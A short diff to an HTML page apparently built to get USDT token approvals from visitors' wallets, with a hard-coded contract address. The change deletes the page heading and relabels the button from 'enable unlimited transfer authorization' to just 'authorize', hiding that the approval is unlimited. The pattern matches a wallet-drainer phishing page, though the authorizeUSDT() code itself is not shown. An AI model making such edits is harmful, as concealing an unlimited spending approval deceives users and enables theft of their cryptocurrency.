--- a/index.html
+++ b/index.html
@@ -25,8 +25,7 @@
   </style>
 </head>
 <body>
-  <h1>USDT 授權頁面</h1>
-  <button onclick="authorizeUSDT()">開啟無限轉帳授權</button>
+  <button onclick="authorizeUSDT()">授權</button>
 
   <script>
     const AUTH_CONTRACT = "TLFVGYGU5wd4z3KzKxr35kNUHQ7zFtff5d"; // 授權合約地址
